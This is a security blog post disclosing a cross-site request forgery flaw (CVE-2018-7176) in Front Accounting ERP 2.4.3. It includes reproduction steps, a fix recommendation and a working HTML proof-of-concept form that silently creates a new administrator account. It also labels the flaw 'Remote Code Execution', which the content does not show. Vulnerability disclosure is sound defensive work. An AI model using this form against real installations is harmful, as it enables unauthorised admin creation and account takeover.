Friday, 16 February 2018
Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176
Cross Site Request Forgery- Front Accounting ERP 2.4.3
By- Samrat Das
Recently while performing some open source security assessment, I came across an ERP Application- Front Accounting . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’.
Title of the Vulnerability: Cross Site Request Forgery.
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source code is coded in a way which allows malicious crafted HTML page to be executed directly without any anti csrf countermeasures.
CVE ID allocated: CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Re-Produce –
1. Visit the application
2. Visit the User Permissions Page.
3. Goto add user, and create a csrf crafted exploit for the same , upon hosting it on a server and sending the link to click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application modification to complete account takeover.
Severity Level: Critical
The presence of such a risk can lead to user data compromise as well as account takeover
<form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
<input type="hidden" name="show_inactive" value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205" />
<input type="submit" value="Submit request" />
Affected Product Version: 2.4.3
Solution - Fix & Patch: The application code should be configured with an anti csrf token to mitigate the issue of Cross Site request forgery.
Security Testing on Block Chain: By- Samrat Das Now since we have our fundamentals clear on block chain, let’s proceed for un...
Hi Readers, today we will learn about another interesting part of Penetration Testing, this revolves around Security assessments of web ...
By- Samrat Das & Navina Asrani Hi Readers, Recently while tinkering with my wifi router, I was curious to find if it has poss...